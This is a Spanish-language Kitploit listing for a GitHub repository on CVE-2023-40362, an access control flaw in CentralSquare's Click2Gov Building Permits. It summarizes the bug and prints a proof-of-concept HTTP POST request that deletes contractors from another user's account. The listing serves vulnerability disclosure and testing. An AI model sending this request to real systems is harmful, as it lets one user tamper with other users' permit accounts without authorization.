Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-40362 — CVE-2023-40362 Detalles de la vulnerabilidad y prueba de concepto | Kitploit
Herramientas/GitHubGitHub/ally-petitt/cve-2023-40362
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubally-petitt/cve-2023-40362

CVE-2023-40362

CVE-2023-40362 Detalles de la vulnerabilidad y prueba de concepto

Ver Repositorio
1hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-40362

CVE-2023-40362 detalles de la vulnerabilidad y prueba de concepto.

Resumen

Una vulnerabilidad de control de acceso en Click2Gov BP en la URI /Click2GovBP/mastercontractorlist.html permite a los usuarios autenticados eliminar contratistas de las cuentas de otros usuarios usando el ID del usuario víctima y la información del contratista a eliminar.

Esto es causado por la falta de verificación por parte de la aplicación web de que el usuario está autorizado a eliminar el contratista de la cuenta para la cual se especifica el ID de usuario.

Vendor: CentralSquare

Reportado por: Ally Petitt

Descubierto: 13 de junio de 2023

Productos afectados: Click2Gov Building Permits (BP)

Versiones afectadas: Antes de octubre de 2023

CVSS v3: 5.4 - Moderado (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)

Prueba de Concepto (PoC)

La solicitud HTTP POST que se muestra a continuación se puede realizar para eliminar un contratista de la cuenta de una víctima. El token CSRF debe ser válido para que esto funcione.

root@kitploit:~
POST /Click2GovBP/mastercontractorlist.html HTTP/1.1
Host: <HOST>
Cookie: welcome=true; JSESSIONID=<SESSION_ID>;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: <USER_AGENT>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

contractorList%5B0%5D.number=<CONTRACTOR_NUMBER>&contractorList%5B0%5D.type=<CONTRACTOR_TYPE>&contractorList%5B0%5D.name=<CONTRACTOR_NAME>&submitRemoveContractor=true&confirmRemoveContractor=true&userId=<USER_ID>&OWASP_CSRFTOKEN=<CSRF_TOKEN>
Descargar herramienta